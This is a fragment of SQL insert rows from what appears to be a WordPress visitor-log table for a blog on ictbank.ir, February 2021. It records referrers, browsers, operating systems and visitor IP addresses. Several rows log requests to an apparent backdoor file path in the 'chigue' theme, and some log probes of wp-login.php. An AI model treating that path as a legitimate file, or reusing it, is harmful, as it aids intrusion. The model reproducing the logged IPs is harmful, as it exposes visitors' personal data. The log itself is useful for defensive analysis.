(9208,'2021-02-22','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?z=F5d4JH6m1','Internet Explorer','Windows','5.1',NULL,NULL,'','126.91.64.193','000',0,1,0),
(9209,'2021-02-22','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','3.239.33.68','000',0,1,0),
(9210,'2021-02-22','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','192.71.225.127','000',0,1,0),
(9211,'2021-02-22','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','95.174.67.196','000',0,2,0),
(9212,'2021-02-22','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','34.236.55.223','000',0,5,0),
(9213,'2021-02-22','http://ictbank.ir/blog','UC Browser','Series40','Unknown',NULL,NULL,'','109.202.111.236','000',0,2,0),
(9214,'2021-02-22','http://ictbank.ir/blog','Chrome','OS X','10.15.2',NULL,NULL,'','157.245.249.183','000',0,1,0),
(9215,'2021-02-22','http://ictbank.ir/blog','Instagram','Android','7.0',NULL,NULL,'','195.181.164.40','000',0,2,0),
(9216,'2021-02-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','92.223.89.206','000',0,2,0),
(9217,'2021-02-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.11.20.134','000',0,1,0),
(9218,'2021-02-22','http://ictbank.ir/blog','Opera Devices','Unknown','Unknown',NULL,NULL,'','45.12.220.188','000',0,2,0),
(9219,'2021-02-22','http://ictbank.ir/blog','Firefox','Windows','6.3',NULL,NULL,'','195.140.215.172','000',0,2,0),
(9220,'2021-02-22','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.223.190.158','000',0,1,0),
(9221,'2021-02-22','http://ictbank.ir/blog','Instagram','Android','7.1.1',NULL,NULL,'','82.102.21.57','000',0,2,0),
(9222,'2021-02-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.201.25.239','000',0,1,0),
(9223,'2021-02-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','151.80.108.146','000',0,2,0),
(9224,'2021-02-22','http://ictbank.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','46.32.124.241','000',0,2,0),
(9225,'2021-02-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','67.201.61.149','000',0,1,0),
(9226,'2021-02-22','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','160.153.147.143','000',0,1,0),
(9227,'2021-02-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.169.222','000',0,1,0),
(9228,'2021-02-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(9229,'2021-02-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,1,0),
(9230,'2021-02-22','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.146.126','000',0,1,0),
(9231,'2021-02-22','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','217.138.192.52','000',0,2,0),
(9232,'2021-02-22','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','194.9.193.243','000',0,1,0),
(9233,'2021-02-22','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(9234,'2021-02-22','http://ictbank.ir/blog','UC Browser','Android','4.4.2',NULL,NULL,'','185.128.26.60','000',0,2,0),
(9235,'2021-02-22','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(9236,'2021-02-22','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','84.17.55.69','000',0,1,0),
(9237,'2021-02-23','http://ictbank.ir/blog','Instagram','Android','7.0',NULL,NULL,'','143.244.56.140','000',0,2,0),
(9238,'2021-02-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','135.125.39.186','000',0,1,0),
(9239,'2021-02-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','85.172.10.95','000',0,1,0),
(9240,'2021-02-23','http://ictbank.ir/blog','Android Browser','Android','4.1.2',NULL,NULL,'','5.253.206.164','000',0,2,0),
(9241,'2021-02-23','http://www.google.com/','Chrome','Android','8.0.0',NULL,NULL,'','190.113.214.248','000',0,2,0),
(9242,'2021-02-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','89.187.189.215','000',0,2,0),
(9243,'2021-02-23','http://ictbank.ir/blog/index.php/2020/02/25/connection-encryption-in-oracle-database/','Chrome','Windows','10.0',NULL,NULL,'','195.181.166.150','000',0,2,0),
(9244,'2021-02-23','http://ictbank.ir/blog','Chrome','Android','6.0.1',NULL,NULL,'','5.180.62.25','000',0,2,0),
(9245,'2021-02-23','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','31.47.50.10','000',0,1,0),
(9246,'2021-02-23','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','45.132.51.95','000',0,13,0),
(9247,'2021-02-23','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','80.82.77.33','000',0,1,0),
(9248,'2021-02-23','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','89.34.98.195','000',0,2,0),
(9249,'2021-02-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.26.32.134','000',0,1,0),
(9250,'2021-02-23','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.108','000',0,3,0),
(9251,'2021-02-23','http://ictbank.ir/blog','Instagram','Android','6.0.1',NULL,NULL,'','5.180.62.31','000',0,2,0),
(9252,'2021-02-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','196.240.57.124','000',0,2,0),
(9253,'2021-02-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.169.255.46','000',0,2,0),
(9254,'2021-02-23','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.212.108.11','000',0,1,0),
(9255,'2021-02-23','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','3.141.153.222','000',0,1,0),
(9256,'2021-02-23','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','151.234.231.29','000',0,1,0),
(9257,'2021-02-23','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','194.35.233.40','000',0,2,0),
(9258,'2021-02-23','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','163.172.68.26','000',0,1,0),
(9259,'2021-02-23','https://www.google.com/','Chrome','Chrome OS','Unknown',NULL,NULL,'','190.87.162.4','000',0,2,0),
(9260,'2021-02-23','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','138.197.197.212','000',0,1,0),
(9261,'2021-02-23','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','5.253.206.92','000',0,2,0),
(9262,'2021-02-23','http://ictbank.ir/blog','Samsung Internet','Android','10',NULL,NULL,'','172.27.240.47','000',0,1,0),
(9263,'2021-02-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(9264,'2021-02-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.151.119','000',0,2,0),
(9265,'2021-02-23','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,1,0),
(9266,'2021-02-23','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(9267,'2021-02-23','http://82.102.9.14/blog','Firefox','Windows','6.0',NULL,NULL,'','47.112.242.174','000',0,3,0),
(9268,'2021-02-23','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','185.236.42.67','000',0,2,0),
(9269,'2021-02-23','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','89.190.156.53','000',0,1,0),
(9270,'2021-02-23','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','176.222.34.111','000',0,2,0),
(9271,'2021-02-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','107.6.157.2','000',0,1,0),
(9272,'2021-02-24','http://ictbank.ir/blog','Android Browser','Android','7.1.2',NULL,NULL,'','194.127.172.95','000',0,2,0),
(9273,'2021-02-24','http://ictbank.ir/blog','Chrome','Windows','6.2',NULL,NULL,'','135.148.33.61','000',0,1,0),
(9274,'2021-02-24','http://ictbank.ir/blog','Chrome','Android','7.0',NULL,NULL,'','185.236.42.67','000',0,4,0),
(9275,'2021-02-24','https://www.ecosia.org/','Safari','iOS','14.5',NULL,NULL,'','24.158.188.127','000',0,1,0),
(9276,'2021-02-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','184.94.240.92','000',0,1,0),
(9277,'2021-02-24','http://design-arena.ir/blog','Edge','Windows','10.0',NULL,NULL,'','192.36.248.249','000',0,1,0),
(9278,'2021-02-24','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','18.229.73.207','000',0,5,0),
(9279,'2021-02-24','http://ictbank.ir/blog','Android Browser','Android','4.4.2',NULL,NULL,'','195.206.183.232','000',0,2,0),
(9280,'2021-02-24','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','91.121.83.67','000',0,1,0),
(9281,'2021-02-24','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(9282,'2021-02-24','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','194.110.84.123','000',0,2,0),
(9283,'2021-02-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','3.133.136.249','000',0,1,0),
(9284,'2021-02-24','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.125.65.39','000',0,1,0),
(9285,'2021-02-24','http://ictbank.ir/blog','Samsung Internet','Android','7.0',NULL,NULL,'','77.81.139.204','000',0,2,0),
(9286,'2021-02-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.225','000',0,3,0),
(9287,'2021-02-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.214.215.48','000',0,1,0),
(9288,'2021-02-24','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(9289,'2021-02-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.132.214.20','000',0,7,0),
(9290,'2021-02-24','http://ictbank.ir/blog','Facebook','Android','6.0.1',NULL,NULL,'','217.138.222.228','000',0,2,0),
(9291,'2021-02-24','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','144.202.83.41','000',0,1,0),
(9292,'2021-02-24','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','45.140.206.67','000',0,1,0),
(9293,'2021-02-24','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','193.169.255.95','000',0,1,0),
(9294,'2021-02-24','http://ictbank.ir/blog','Facebook','Android','8.0.0',NULL,NULL,'','195.181.166.95','000',0,2,0),
(9295,'2021-02-24','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','13.59.166.149','000',0,1,0),
(9296,'2021-02-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.163.7','000',0,1,0),
(9297,'2021-02-24','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.238.73.149','000',0,1,0),
(9298,'2021-02-24','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','109.70.144.27','000',0,2,0),
(9299,'2021-02-24','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','41.250.147.25','000',0,1,0),
(9300,'2021-02-24','https://www.google.com/','Chrome','Fedora','Unknown',NULL,NULL,'','78.69.121.175','000',0,1,0),
(9301,'2021-02-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.108.28','000',0,1,0),
(9302,'2021-02-24','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.167.147','000',0,3,0),
(9303,'2021-02-24','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,1,0),
(9304,'2021-02-24','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','141.98.100.172','000',0,2,0),
(9305,'2021-02-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','95.213.191.70','000',0,1,0),
(9306,'2021-02-24','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','195.154.232.125','000',0,1,0),
(9307,'2021-02-24','http://ictbank.ir/blog','Android Browser','Android','4.4.4',NULL,NULL,'','152.89.163.164','000',0,2,0),
(9308,'2021-02-24','http://ictbank.ir/blog','Yandex Browser','Windows','10.0',NULL,NULL,'','194.110.84.111','000',0,2,0),
(9309,'2021-02-24','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','44.192.3.247','000',0,1,0),
(9310,'2021-02-25','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','193.106.30.100','000',0,1,0),
(9311,'2021-02-25','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(9312,'2021-02-25','http://ictbank.ir/blog','Facebook','Android','6.0.1',NULL,NULL,'','89.40.183.13','000',0,2,0),
(9313,'2021-02-25','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.225','000',0,6,0),
(9314,'2021-02-25','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','129.146.122.208','000',0,3,0),
(9315,'2021-02-25','http://ictbank.ir/blog','Chrome','Windows','6.3',NULL,NULL,'','195.181.170.137','000',0,2,0),
(9316,'2021-02-25','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,1,0),
(9317,'2021-02-25','http://ictbank.ir/blog','Unknown','Android','7.0',NULL,NULL,'','86.106.103.10','000',0,2,0),
(9318,'2021-02-25','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','213.232.87.191','000',0,2,0),
(9319,'2021-02-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.214.124.222','000',0,1,0),
(9320,'2021-02-25','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?z=F5d4JH6m1','Internet Explorer','Windows','5.1',NULL,NULL,'','114.205.105.197','000',0,1,0),
(9321,'2021-02-25','http://ictbank.ir/blog','Android Browser','Android','4.2.2',NULL,NULL,'','45.83.91.124','000',0,2,0),
(9322,'2021-02-25','http://ictbank.ir/blog/wp-login.php','Chrome','Windows','6.1',NULL,NULL,'','113.53.96.197','000',0,2,0),
(9323,'2021-02-25','http://ictbank.ir/blog','Internet Explorer','Windows','6.1',NULL,NULL,'','195.154.51.48','000',0,2,0),
(9324,'2021-02-25','http://ictbank.ir/blog','Chrome','Android','4.3',NULL,NULL,'','195.140.213.38','000',0,2,0),
(9325,'2021-02-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.190.7.248','000',0,1,0),
(9326,'2021-02-25','http://ictbank.ir/blog','Chrome','OS X','10.15.0',NULL,NULL,'','18.232.187.65','000',0,1,0),
(9327,'2021-02-25','http://ictbank.ir/blog','Android Browser','Android','4.2.2',NULL,NULL,'','195.206.183.132','000',0,2,0),
(9328,'2021-02-25','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','185.222.57.164','000',0,1,0),
(9329,'2021-02-25','http://ictbank.ir/blog','Android Browser','Android','3.1',NULL,NULL,'','185.114.224.107','000',0,2,0),
(9330,'2021-02-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.11.114','000',0,1,0),
(9331,'2021-02-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.39.113','000',0,1,0),
(9332,'2021-02-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(9333,'2021-02-25','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.63.96.229','000',0,1,0),
(9334,'2021-02-25','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','44.228.128.199','000',0,1,0),
(9335,'2021-02-25','http://ictbank.ir/blog','Android Browser','Android','4.4.2',NULL,NULL,'','193.176.86.108','000',0,2,0),
(9336,'2021-02-25','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.20','000',0,2,0),
(9337,'2021-02-25','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.23','000',0,1,0),
(9338,'2021-02-25','http://ictbank.ir/blog','Chrome','OS X','10.8.3',NULL,NULL,'','54.188.102.142','000',0,1,0),
(9339,'2021-02-25','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','217.138.216.36','000',0,2,0),
(9340,'2021-02-25','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(9341,'2021-02-26','http://ictbank.ir/blog','Unknown','Android','8.0.0',NULL,NULL,'','194.35.233.173','000',0,2,0),
(9342,'2021-02-26','http://ictbank.ir/blog/wp-login.php','Firefox','Ubuntu','Unknown',NULL,NULL,'','78.162.132.29','000',0,2,0),
(9343,'2021-02-26','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','45.152.181.36','000',0,2,0),
(9344,'2021-02-26','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','5.189.131.236','000',0,1,0),
(9345,'2021-02-26','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','37.120.133.68','000',0,2,0),
(9346,'2021-02-26','http://ictbank.ir/blog','UC Browser','Android','4.1.1',NULL,NULL,'','193.176.86.108','000',0,2,0),
(9347,'2021-02-26','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','75.127.5.45','000',0,10,0),
(9348,'2021-02-26','https://www.google.com/','Chrome','Linux','Unknown',NULL,NULL,'','31.14.92.28','000',0,1,0),
(9349,'2021-02-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','40.85.212.125','000',0,1,0),
(9350,'2021-02-26','http://ictbank.ir/blog','Instagram','Android','6.0.1',NULL,NULL,'','109.202.111.236','000',0,2,0),
(9351,'2021-02-26','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.225','000',0,3,0),
(9352,'2021-02-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','88.99.82.169','000',0,1,0),
(9353,'2021-02-26','http://ictbank.ir/blog','UC Browser','Android','8.1.0',NULL,NULL,'','195.206.107.28','000',0,2,0),
(9354,'2021-02-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.245.177.159','000',0,1,0),
(9355,'2021-02-26','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','185.142.236.34','000',0,1,0),
(9356,'2021-02-26','http://ictbank.ir/blog','UC Browser','Android','5.0',NULL,NULL,'','85.208.72.251','000',0,4,0),
(9357,'2021-02-26','http://ictbank.ir/blog','Facebook','Android','6.0',NULL,NULL,'','45.83.91.164','000',0,2,0),
(9358,'2021-02-26','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.188.182.105','000',0,1,0),
(9359,'2021-02-26','http://82.102.9.14:80/blog','Chrome','Windows','6.1',NULL,NULL,'','43.242.74.23','000',0,1,0),
(9360,'2021-02-26','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','124.227.31.81','000',0,1,0),
(9361,'2021-02-26','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','93.174.95.106','000',0,1,0),
(9362,'2021-02-26','http://ictbank.ir/blog','Safari','Windows','6.1',NULL,NULL,'','34.232.51.253','000',0,1,0),
(9363,'2021-02-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.149.149.211','000',0,1,0),
(9364,'2021-02-26','http://ictbank.ir/blog','Facebook','Android','6.0',NULL,NULL,'','5.180.62.31','000',0,2,0),
(9365,'2021-02-26','http://ictbank.ir/blog','Yandex Browser','Windows','6.1',NULL,NULL,'','95.174.67.212','000',0,2,0),
(9366,'2021-02-26','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','51.254.59.113','000',0,1,0),
(9367,'2021-02-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','209.250.228.116','000',0,1,0),
(9368,'2021-02-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.13.106','000',0,1,0),
(9369,'2021-02-26','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','78.141.196.164','000',0,2,0),
(9370,'2021-02-26','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','176.9.8.180','000',0,15,0),
(9371,'2021-02-26','http://ictbank.ir/blog/wp-login.php','Safari','OS X','10.12.6',NULL,NULL,'','182.253.22.222','000',0,2,0),
(9372,'2021-02-26','http://ictbank.ir/blog/','Internet Explorer','Windows','5.1',NULL,NULL,'','109.252.111.151','000',0,1,0),
(9373,'2021-02-26','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','152.89.163.164','000',0,2,0),
(9374,'2021-02-26','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','194.99.105.248','000',0,2,0),
(9375,'2021-02-27','http://ictbank.ir/blog','Chrome','Android','7.0',NULL,NULL,'','194.35.233.173','000',0,2,0),
(9376,'2021-02-27','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.125.65.39','000',0,1,0),
(9377,'2021-02-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','157.90.165.82','000',0,1,0),
(9378,'2021-02-27','http://ictbank.ir/blog','Android Browser','Android','4.3',NULL,NULL,'','217.138.216.36','000',0,2,0),
(9379,'2021-02-27','https://www.google.ca/','Chrome','Windows','10.0',NULL,NULL,'','67.70.35.165','000',0,1,0),
(9380,'2021-02-27','http://ictbank.ir/blog','Chrome','Windows','5.1',NULL,NULL,'','18.229.73.207','000',0,5,0),
(9381,'2021-02-27','http://ictbank.ir/blog','Opera','Windows','10.0',NULL,NULL,'','45.12.223.252','000',0,2,0),
(9382,'2021-02-27','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.155.205.225','000',0,6,0),
(9383,'2021-02-27','http://ictbank.ir/blog','Internet Explorer','Windows','6.3',NULL,NULL,'','195.181.170.137','000',0,2,0),
(9384,'2021-02-27','http://ictbank.ir/blog','Instagram','Android','6.0.1',NULL,NULL,'','141.98.103.180','000',0,4,0),
(9385,'2021-02-27','http://ictbank.ir/blog','Opera','Windows','6.1',NULL,NULL,'','194.110.114.140','000',0,2,0),
(9386,'2021-02-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.78.9','000',0,1,0),
(9387,'2021-02-27','https://duckduckgo.com/','Firefox','Ubuntu','Unknown',NULL,NULL,'','67.160.215.59','000',0,1,0),
(9388,'2021-02-27','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','103.85.38.51','000',0,1,0),
(9389,'2021-02-27','http://ictbank.ir/blog','Android Browser','Android','4.2.2',NULL,NULL,'','143.244.56.140','000',0,2,0),
(9390,'2021-02-27','http://ictbank.ir/blog','Safari','OS X','10.15.6',NULL,NULL,'','85.226.243.57','000',0,3,0),
(9391,'2021-02-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','194.35.233.67','000',0,2,0),
(9392,'2021-02-27','http://ictbank.ir/blog/wp-login.php','Chrome','OS X','10.12.6',NULL,NULL,'','120.29.159.154','000',0,2,0),
(9393,'2021-02-27','https://duckduckgo.com/','Firefox','Fedora','Unknown',NULL,NULL,'','75.117.193.246','000',0,1,0),
(9394,'2021-02-27','http://ictbank.ir/blog','UC Browser','Android','5.0.1',NULL,NULL,'','109.202.111.236','000',0,2,0),
(9395,'2021-02-27','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,1,0),
(9396,'2021-02-27','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.188.145','000',0,1,0),
(9397,'2021-02-27','http://ictbank.ir/blog','Facebook','Android','7.0',NULL,NULL,'','89.187.189.215','000',0,2,0),
(9398,'2021-02-27','http://ictbank.ir/blog','Android Browser','Android','2.2.1',NULL,NULL,'','217.146.82.122','000',0,2,0),
(9399,'2021-02-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.151.119','000',0,1,0),
(9400,'2021-02-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','199.247.13.106','000',0,1,0),
(9401,'2021-02-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.108.28','000',0,1,0),
(9402,'2021-02-27','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','143.110.169.222','000',0,1,0),
(9403,'2021-02-27','http://ictbank.ir/blog','Samsung Internet','Android','7.0',NULL,NULL,'','77.81.139.164','000',0,2,0),
(9404,'2021-02-27','http://82.102.9.14/blog','Chrome','Linux','Unknown',NULL,NULL,'','49.51.160.201','000',0,5,0),
(9405,'2021-02-27','http://ictbank.ir/blog','Opera','Windows','6.2',NULL,NULL,'','86.106.103.20','000',0,2,0),
(9406,'2021-02-28','http://design-arena.ir/blog','Firefox Mobile','Android','8.0.0',NULL,NULL,'','157.90.165.82','000',0,1,0),
(9407,'2021-02-28','http://ictbank.ir/blog','Chrome','OS X','10.15.4',NULL,NULL,'','34.247.64.224','000',0,1,0),
(9408,'2021-02-28','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','68.183.231.225','000',0,2,0),
(9409,'2021-02-28','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','132.148.80.37','000',0,1,0),
(9410,'2021-02-28','http://ictbank.ir/blog','Yandex Browser','Windows','6.3',NULL,NULL,'','45.152.181.36','000',0,2,0),
(9411,'2021-02-28','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','100.1.50.205','000',0,1,0),
(9412,'2021-02-28','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?z=F5d4JH6m1','Internet Explorer','Windows','5.1',NULL,NULL,'','210.126.16.188','000',0,1,0),
(9413,'2021-02-28','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?z=F5d4JH6m1','Internet Explorer','Windows','5.1',NULL,NULL,'','112.165.238.77','000',0,1,0),
(9414,'2021-02-28','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?z=F5d4JH6m1','Internet Explorer','Windows','5.1',NULL,NULL,'','58.122.238.220','000',0,1,0),
(9415,'2021-02-28','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?z=F5d4JH6m1','Internet Explorer','Windows','5.1',NULL,NULL,'','1.248.207.81','000',0,1,0),
(9416,'2021-02-28','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?z=F5d4JH6m1','Internet Explorer','Windows','5.1',NULL,NULL,'','111.216.2.164','000',0,1,0),
(9417,'2021-02-28','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?z=F5d4JH6m1','Internet Explorer','Windows','5.1',NULL,NULL,'','118.221.156.32','000',0,1,0),
(9418,'2021-02-28','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?z=F5d4JH6m1','Internet Explorer','Windows','5.1',NULL,NULL,'','109.75.202.37','000',0,1,0),
(9419,'2021-02-28','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?z=F5d4JH6m1','Internet Explorer','Windows','5.1',NULL,NULL,'','126.120.196.115','000',0,1,0),
(9420,'2021-02-28','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?z=F5d4JH6m1','Internet Explorer','Windows','5.1',NULL,NULL,'','122.37.50.229','000',0,1,0),
(9421,'2021-02-28','http://82.102.9.14/blog/wp-content/themes/chigue/wp_class_datalib.php?z=F5d4JH6m1','Internet Explorer','Windows','5.1',NULL,NULL,'','125.12.185.105','000',0,1,0),
(9422,'2021-02-28','http://ictbank.ir/blog','Android Browser','Android','4.2.2',NULL,NULL,'','84.17.43.155','000',0,2,0),
(9423,'2021-02-28','http://ictbank.ir/blog','Internet Explorer','Windows','5.2',NULL,NULL,'','41.111.132.33','000',0,1,0),
(9424,'2021-02-28','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.167','000',0,1,0),
(9425,'2021-02-28','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','196.240.57.44','000',0,2,0),
(9426,'2021-02-28','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.12.223.84','000',0,2,0),
(9427,'2021-02-28','http://ictbank.ir/blog','Unknown','OS X','10.15.6',NULL,NULL,'','85.226.243.57','000',0,1,0),
